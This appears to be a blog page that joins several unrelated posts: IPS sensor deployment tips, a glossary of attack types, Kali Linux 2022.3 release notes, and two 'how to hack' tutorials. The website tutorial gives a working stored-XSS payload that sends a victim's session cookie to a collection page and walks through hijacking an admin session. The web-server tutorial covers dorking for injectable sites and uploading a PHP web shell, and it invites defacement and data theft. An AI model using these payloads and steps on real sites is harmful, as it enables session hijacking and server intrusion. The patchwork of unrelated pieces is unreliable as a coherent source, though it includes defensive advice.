Deploying Sensors for Intrusion Prevention Systems (IPS)

 

Today, I am sharing the crux of that discussion with you…
Technical factors to consider when selecting sensors for deployment in an organization include the following:

~~ The network media in use
~~ The performance of the sensor
~~ The overall network design
~~ The IPS design (Will the sensor analyze and protect many systems or just a few?)
~~ Virtualization (Will multiple virtual sensors be created in the sensor?)

Important issues to keep in mind in an IPS design include the following:

1. Your network topology:
Size and complexity, connections, and the amount and type of traffic.

2. Sensor placement:
It is recommended that these be placed at those entry and exit points that provide sufficient IPS coverage.

3. Your management and monitoring options:
The number of sensors often dictates the level of management you need.

Locations that generally need to be protected include the following:

* Internet: Sensor between your perimeter gateway and the Internet
* Extranet: Between your network and extranet connection
* Internal: Between internal data centers
* Remote access: Hardens perimeter control
* Server farm: Network IPS at the perimeter and host IPS on the servers

-

Please let me know of what do you think about this in the comment section. You can also share with all if the information shared here helps you in some manner.

TYPES OF CYBER ATTACKS

 

@ Malware

Software programs designed to damage or do unwanted actions on a computer. Common examples include: viruses, worms, trojan horses, spyware, and ransomware.

@ Phishing

Attacks sent via email and ask users to click on a link and enter their personal data. They include a link that directs the user to a dummy site that will steal a user’s information.

@ Password Attacks

Involves a third party trying to gain access to your systems by solving a user’s password.

@ Denial of Service Attacks (DoS or DDoS)

Attackers send high volumes of data or traffic through the network until the network becomes overloaded and can no longer function

@ Man in the Middle (MITM)

Information is obtained from the end user and the entity the user is communicating with by impersonating the endpoints in an online information exchange (i.e. connection from smartphone to website).

@ Drive-by Downloads

A program is downloaded to a user’s system just by visiting the site. It doesn’t require any type of action by the user to download.

@ Malversating

Malversating ("malicious advertising") is the use of online advertising to spread malware. It typically involves injecting malicious or malware-laden advertisements into legitimate online advertising networks and webpages.

@ Rogue Software's

Rogue security software is a form of malicious software and internet fraud that misleads users into believing there is a virus on their computer and aims to convince them to pay for a fake malware removal tool that actually installs malware on their computer. It is a form of scareware that manipulates users through fear, and a form of ransomware

-

Kali Linux 2022.3 – Added Bruteshark And Test Lab Environment

 

Offensive Security has released Kali Linux 2022.3 with major updates.

It is a popular platform for ethical hackers and penetration testers, and an operating system for identifying vulnerabilities within a network.

Previously in Kali Linux 2022.2 version were added 10 tools.

Kali’s 2022.3’s Release Highlights:

• Discord Server – Kali’s new community real-time chat option has launched!
• Test Lab Environment – Quickly create a test bed to learn, practice, and benchmark tools and compare their results
• Opening Kali-Tools Repo – We have opened up the Kali tools repository and are accepting your submissions!
• Help Wanted – We are looking for a Go developer to help us on an open-source project
• Kali NetHunter Updates – New releases in our NetHunter store
• Virtual Machines Updates – New VirtualBox image format, weekly images, and build-scripts to build your own

Other Kali updates

• For people who use Xrdp (like Win-KeX), there is a new look to the login
• Fixed up some confusion between fuse and fuse3
• Some maintenance to our network repository, and shrank /kali from 1.7Tb to 520Gb!

New Tools Added –

Kali Linux would not be a release without some new tools!

A quick run down of what has been added (to the network repositories):

• BruteShark – Network Analysis Tool
• DefectDojo – Open-source application vulnerability correlation and security orchestration tool
• phpsploit – Stealth post-exploitation framework
• shellfire – Exploiting LFI/RFI and command injection vulnerabilities
• SprayingToolkit – Password spraying attacks against Lync/S4B, OWA and O365

There have been numerous packages updates as well.

Kali NetHunter Updates

Full Android 12 support is getting closer to being a reality with 6 new kernels in our NetHunter repository and updates to the NetHunter app.

It is still not for the fainthearted as a little tinkering is required to install all the components individually but we’re getting closer to releasing the first OnePlus image soon.

For the meantime, we have updated the apps in our NetHunter Store to the latest releases, including:

• aRDP, aSPICE, bVNC, Opaque = v5.1.0
• Connectbot = 1.9.8-oss
• Intercepter-NG = 2.8
• OONI Probe = 3.7.0
• OpenVPN = 0.7.38
• Orbot = 16.4.1-RC-2-tor.0.4.4.6
• SnoopSnitch = 2.0.12-nbc
• Termux = 118
• Termux-API = 51
• Termux-Styling = 29
• Termux-Tasker = 6
• Termux-Widget = 13
• Termux-Float = 15
• WiGLE WiFi Wardriving = 2.64

If you would like to get involved and help out with the development, or just like to chat to like-minded Android tinkerers, why don’t you join us in the NetHunter channels on our new Discord server? We’d love to see you around!

Existing Installs:

If you already have an existing Kali Linux installation, remember you can always do a quick update:

┌──(kali㉿kali)-[~] └─$ echo “deb http://http.kali.org/kali kali-rolling main non-free contrib” | sudo tee /etc/apt/sources.list

┌──(kali㉿kali)-[~] └─$ sudo apt update && sudo apt -y full-upgrade

┌──(kali㉿kali)-[~] └─$ cp -rbi /etc/skel/. ~

┌──(kali㉿kali)-[~] └─$ [ -f /var/run/reboot-required ] && sudo reboot -f
You should now be on Kali Linux 2022.3 We can do a quick check by doing:

┌──(kali㉿kali)-[~] └─$ grep VERSION /etc/os-release
VERSION=”2022.3″
VERSION_ID=”2022.3″
VERSION_CODENAME=”kali-rolling”

┌──(kali㉿kali)-[~] └─$ uname -v
#1 SMP PREEMPT_DYNAMIC Debian 5.18.5-1kali6 (2022-07-07)

┌──(kali㉿kali)-[~] └─$ uname -r
5.18.0-kali5-amd64
NOTE: The output of uname -r may be different depending on the system

Kali Linux 2022.3 Download

How to Hack a Website: Hacking Websites Online Example

More people have access to the internet than ever before. This has prompted many organizations to develop web-based applications that users can use online to interact with the organization. Poorly written code for web applications can be exploited to gain unauthorized access to sensitive data and web servers. In this tutorial you will learn how to hack websites, and we will introduce you to web application hacking techniques and the counter measures you can put in place to protect against such attacks.

What is a web application? What are Web Threats?

A web application (aka website) is an application based on the client-server model. The server provides the database access and the business logic. It is hosted on a web server. The client application runs on the client web browser. Web applications are usually written in languages such as Java, C#, and VB.Net, PHP, ColdFusion Markup Language, etc. the database engines used in web applications include MySQL, MS SQL Server, PostgreSQL, SQLite, etc.

Most web applications are hosted on public servers accessible via the Internet. This makes them vulnerable to attacks due to easy accessibility. The following are common web application threats.

• SQL Injection – the goal of this threat could be to bypass login algorithms, sabotage the data, etc.
• Denial of Service Attacks– the goal of this threat could be to deny legitimate users access to the resource
• Cross Site Scripting XSS– the goal of this threat could be to inject code that can be executed on the client side browser.
• Cookie/Session Poisoning– the goal of this threat is to modify cookies/session data by an attacker to gain unauthorized access.
• Form Tampering – the goal of this threat is to modify form data such as prices in e-commerce applications so that the attacker can get items at reduced prices.
• Code Injection – the goal of this threat is to inject code such as PHP, Python, etc. that can be executed on the server. The code can install backdoors, reveal sensitive information, etc.
• Defacement– the goal of this threat is to modify the page been displayed on a website and redirecting all page requests to a single page that contains the attacker’s message.

How to protect your Website against hacks?

An organization can adopt the following policy to protect itself against web server attacks.

• SQL Injection– sanitizing and validating user parameters before submitting them to the database for processing can help reduce the chances of been attacked via SQL Injection. Database engines such as MS SQL Server, MySQL, etc. support parameters, and prepared statements. They are much safer than traditional SQL statements
• Denial of Service Attacks – firewalls can be used to drop traffic from suspicious IP address if the attack is a simple DoS. Proper configuration of networks and Intrusion Detection System can also help reduce the chances of a DoS attack been successful.
• Cross Site Scripting – validating and sanitizing headers, parameters passed via the URL, form parameters and hidden values can help reduce XSS attacks.
• Cookie/Session Poisoning– this can be prevented by encrypting the contents of the cookies, timing out the cookies after some time, associating the cookies with the client IP address that was used to create them.
• Form tempering – this can be prevented by validating and verifying the user input before processing it.
• Code Injection – this can be prevented by treating all parameters as data rather than executable code. Sanitization and Validation can be used to implement this.
• Defacement – a good web application development security policy should ensure that it seals the commonly used vulnerabilities to access the web server. This can be a proper configuration of the operating system, web server software, and best security practices when developing web applications.

Website hacking tricks: Hack a Website online

In this website hacking practical scenario, we are going to hijack the user session of the web application located at www.techpanda.org. We will use cross site scripting to read the cookie session id then use it to impersonate a legitimate user session.

The assumption made is that the attacker has access to the web application and he would like to hijack the sessions of other users that use the same application. The goal of this attack could be to gain admin access to the web application assuming the attacker’s access account is a limited one.

Getting started

• Open http://www.techpanda.org/
• For practice purposes, it is strongly recommended to gain access using SQL Injection. Refer to this article for more information on how to do that.
• The login email is admin@google.com, the password is Password2010
• If you have logged in successfully, then you will get the following dashboard

• Click on Add New Contact
• Enter the following as the first name

<a href=# onclick=\”document.location=\’http://techpanda.org/snatch_sess_id.php?c=\’+escape\(document.cookie\)\;\”>Dark</a>

HERE,

The above code uses JavaScript. It adds a hyperlink with an onclick event. When the unsuspecting user clicks the link, the event retrieves the PHP cookie session ID and sends it to the snatch_sess_id.php page together with the session id in the URL

• Enter the remaining details as shown below
• Click on Save Changes

• Your dashboard will now look like the following screen

• Since the cross site script code is stored in the database, it will be loaded everytime the users with access rights login
• Let’s suppose the administrator logins and clicks on the hyperlink that says Dark
• He/she will get the window with the session id showing in the URL

Note: the script could be sending the value to some remote server where the PHPSESSID is stored then the user redirected back to the website as if nothing happened.

Note: the value you get may be different from the one in this webpage hacking tutorial, but the concept is the same

session Impersonation using Firefox and Tamper Data add-on

The flowchart below shows the steps that you must take to complete this exercise.

• You will need Firefox web browser for this section and Tamper Data add-on
• Open Firefox and install the add as shown in the diagrams below

• Search for tamper data then click on install as shown above

• Click on Accept and Install…

• Click on Restart now when the installation completes
• Enable the menu bar in Firefox if it is not shown

• Click on tools menu then select Tamper Data as shown below

• You will get the following Window. Note: If the Windows is not empty, hit the clear button

• Click on Start Tamper menu
• Switch back to Firefox web browser, type http://www.techpanda.org/dashboard.php then press the enter key to load the page
• You will get the following pop up from Tamper Data

• The pop-up window has three (3) options. The Tamper option allows you to modify the HTTP header information before it is submitted to the server.
• Click on it
• You will get the following window

• Copy the PHP session ID you copied from the attack URL and paste it after the equal sign. Your value should now look like this

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2

• Click on OK button
• You will get the Tamper data popup window again

• Uncheck the checkbox that asks Continue Tampering?
• Click on submit button when done
• You should be able to see the dashboard as shown below

Note: we did not login, we impersonated a login session using the PHPSESSID value we retrieved using cross site scripting

Summary

• A web application is based on the server-client model. The client side uses the web browser to access the resources on the server.
• Web applications are usually accessible over the internet. This makes them vulnerable to attacks.
• Web application threats include SQL Injection, Code Injection, XSS, Defacement, Cookie poisoning, etc.
• A good security policy when developing web applications can help make them secure.

Guru99 is Sponsored by Invicti

How to Hack a Web Server

 Customers usually turn to the internet to get information and buy products and services. Towards that end, most organizations have websites.Most websites store valuable information such as credit card numbers, email address and passwords, etc. This has made them targets to attackers. Defaced websites can also be used to communicate religious or political ideologies etc.

In this tutorial, we will introduce you toweb servers hacking techniques and how you can protect servers from such attacks.

Web server vulnerabilities

A web server is a program that stores files (usually web pages) and makes them accessible via the network or the internet. A web server requires both hardware and software. Attackers usually target the exploits in the software to gain authorized entry to the server. Let’s look at some of the common vulnerabilities that attackers take advantage of.

• Default settings– These settings such as default user id and passwords can be easily guessed by the attackers. Default settings might also allow performing certain tasks such as running commands on the server which can be exploited.
• Misconfigurationof operating systems and networks – certain configuration such as allowing users to execute commands on the server can be dangerous if the user does not have a good password.
• Bugs in the operating system and web servers– discovered bugs in the operating system or web server software can also be exploited to gain unauthorized access to the system.

In additional to the above-mentioned web server vulnerabilities, the following can also led to unauthorized access

• Lack of security policy and procedures– lack of a security policy and procedures such as updating antivirus software, patching the operating system and web server software can create security loop holes for attackers.

Types of Web Servers

The following is a list of the common web servers

• Apache– This is the commonly used web server on the internet. It is cross platform but is it’s usually installed on Linux. Most PHP websites are hosted on Apache servers.
• Internet Information Services (IIS)– It is developed by Microsoft. It runs on Windows and is the second most used web server on the internet. Most asp and aspx websites are hosted on IIS servers.
• Apache Tomcat – Most Java server pages (JSP) websites are hosted on this type of web server.
• Other web servers – These include Novell’s Web Server and IBM’s Lotus Domino servers.

Types of Attacks against Web Servers

Directory traversal attacks– This type of attacks exploits bugs in the web server to gain unauthorized access to files and folders that are not in the public domain. Once the attacker has gained access, they can download sensitive information, execute commands on the server or install malicious software.

• Denial of Service Attacks– With this type of attack, the web server may crash or become unavailable to the legitimate users.
• Domain Name System Hijacking – With this type of attacker, the DNS setting are changed to point to the attacker’s web server. All traffic that was supposed to be sent to the web server is redirected to the wrong one.
• Sniffing– Unencrypted data sent over the network may be intercepted and used to gain unauthorized access to the web server.
• Phishing– With this type of attack, the attack impersonates the websites and directs traffic to the fake website. Unsuspecting users may be tricked into submitting sensitive data such as login details, credit card numbers, etc.
• Pharming– With this type of attack, the attacker compromises the Domain Name System (DNS) servers or on the user computer so that traffic is directed to a malicious site.
• Defacement– With this type of attack, the attacker replaces the organization’s website with a different page that contains the hacker’s name, images and may include background music and messages.

Effects of successful attacks

• An organization’s reputation can be ruined if the attacker edits the website content and includes malicious information or links to a porn website
• The web server can be used to install malicious software on users who visit the compromised website. The malicious software downloaded onto the visitor’s computer can be a virus, Trojan or Botnet Software, etc.
• Compromised user data may be used for fraudulent activities which may lead to business loss or lawsuits from the users who entrusted their details with the organization

Web server attack tools

Some of the common web server attack tools include;

• Metasploit– this is an open source tool for developing, testing and using exploit code. It can be used to discover vulnerabilities in web servers and write exploits that can be used to compromise the server.
• MPack– this is a web exploitation tool. It was written in PHP and is backed by MySQL as the database engine. Once a web server has been compromised using MPack, all traffic to it is redirected to malicious download websites.
• Zeus– this tool can be used to turn a compromised computer into a bot or zombie. A bot is a compromised computer which is used to perform internet-based attacks. A botnet is a collection of compromised computers. The botnet can then be used in a denial of service attack or sending spam mails.
• Neosplit – this tool can be used to install programs, delete programs, replicating it, etc.

How to avoid attacks on Web server

An organization can adopt the following policy to protect itself against web server attacks.

• Patch management– this involves installing patches to help secure the server. A patch is an update that fixes a bug in the software. The patches can be applied to the operating system and the web server system.
• Secure installation and configuration of the operating system
• Secure installation and configuration of the web server software
• Vulnerability scanning system– these include tools such as Snort, NMap, Scanner Access Now Easy (SANE)
• Firewalls can be used to stop simple DoS attacks by blocking all traffic coming the identify source IP addresses of the attacker.
• Antivirus software can be used to remove malicious software on the server
• Disabling Remote Administration
• Default accounts and unused accounts must be removed from the system
• Default ports & settings (like FTP at port 21) should be changed to custom port & settings (FTP port at 5069)

Hacking Activity: Hack a WebServer

In this practical scenario, we are going to look at the anatomy of a web server attack. We will assume we are targeting www.techpanda.org. We are not actually going to hack into it as this is illegal. We will only use the domain for educational purposes.

What we will need

• A target www.techpanda.org
• Bing search engine
• SQL Injection Tools
• PHP Shell, we will use dk shell http://sourceforge.net/projects/icfdkshell/

Information gathering

We will need to get the IP address of our target and find other websites that share the same IP address.

We will use an online tool to find the target’s IP address and other websites sharing the IP address

• Enter the URL https://www.yougetsignal.com/tools/web-sites-on-web-server/ in your web browser
• Enter www.techpanda.org as the target

• Click on Check button
• You will get the following results

Based on the above results, the IP address of the target is 69.195.124.112

We also found out that there are 403 domains on the same web server.

Our next step is to scan the other websites for SQL injection vulnerabilities. Note: if we can find a SQL vulnerable on the target, then we would directly exploit it without considering other websites.

• Enter the URL www.bing.com into your web browser. This will only work with Bing so don’t use other search engines such as google or yahoo
• Enter the following search query

ip:69.195.124.112 .php?id=

HERE,

• “ip:69.195.124.112” limits the search to all the websites hosted on the web server with IP address 69.195.124.112
• “.php?id=” search for URL GET variables used a parameters for SQL statements.

You will get the following results

As you can see from the above results, all the websites using GET variables as parameters for SQL injection have been listed.

The next logic step would be to scan the listed websites for SQL Injection vulnerabilities. You can do this using manual SQL injection or use tools listed in this article on SQL Injection.

Uploading the PHP Shell

We will not scan any of the websites listed as this is illegal. Let’s assume that we have managed to login into one of them. You will have to upload the PHP shell that you downloaded from http://sourceforge.net/projects/icfdkshell/

• Open the URL where you uploaded the dk.php file.
• You will get the following window

• Clicking the Symlink URL will give you access to the files in the target domain.

Once you have access to the files, you can get login credentials to the database and do whatever you want such as defacement, downloading data such as emails, etc.

Summary

• Web server stored valuable information and are accessible to the public domain. This makes them targets for attackers.
• The commonly used web servers include Apache and Internet Information Service IIS
• Attacks against web servers take advantage of the bugs and Misconfiguration in the operating system, web servers, and networks
• Popular web server hacking tools include Neosploit, MPack, and ZeuS.
• A good security policy can reduce the chances of been attacked